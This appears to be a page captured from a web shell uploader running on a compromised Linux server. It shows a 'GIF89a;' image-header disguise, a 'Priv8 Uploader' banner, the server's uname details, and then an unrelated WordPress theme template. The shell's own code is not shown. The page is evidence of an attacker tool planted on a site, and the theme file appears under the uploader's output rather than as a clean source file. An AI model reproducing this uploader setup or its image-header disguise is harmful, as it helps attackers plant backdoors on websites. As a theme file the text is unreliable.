GIF89a;
Priv8 Uploader By InMyMine7
Linux server.fluxioninnovation.in 6.8.0-1041-oracle #42~22.04.1-Ubuntu SMP Fri Dec 5 16:59:35 UTC 2025 aarch64
<?php /** * wp-blank WordPress Theme, ordasvit.com * wp-blank is distributed under the terms of the GNU GPL * Copyright: OrdaSvit, Andrey Kvasnevskiy, ordasvit.com */ ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <header class="entry-header"> <h1 class="entry-title"> <a href="<?php echo esc_url( wp_blank_get_link_url() ); ?>"><?php the_title(); ?></a> </h1> <div class="entry-meta"> <?php wp_blank_entry_date(); ?> <?php edit_post_link( __( 'Edit', 'wp-blank' ), '<span class="edit-link">', '</span>' ); ?> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <?php the_content( __( 'Continue reading <span class="meta-nav">→</span>', 'wp-blank' ) ); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links"><span class="page-links-title">' . __( 'Pages:', 'wp-blank' ) . '</span>', 'after' => '</div>', 'link_before' => '<span>', 'link_after' => '</span>' ) ); ?> </div><!-- .entry-content --> <?php if ( is_single() ) : ?> <footer class="entry-meta"> <?php wp_blank_entry_meta(); ?> <?php if ( get_the_author_meta( 'description' ) && is_multi_author() ) : ?> <?php get_template_part( 'author-bio' ); ?> <?php endif; ?> </footer><!-- .entry-meta --> <?php endif; ?> </article><!-- #post -->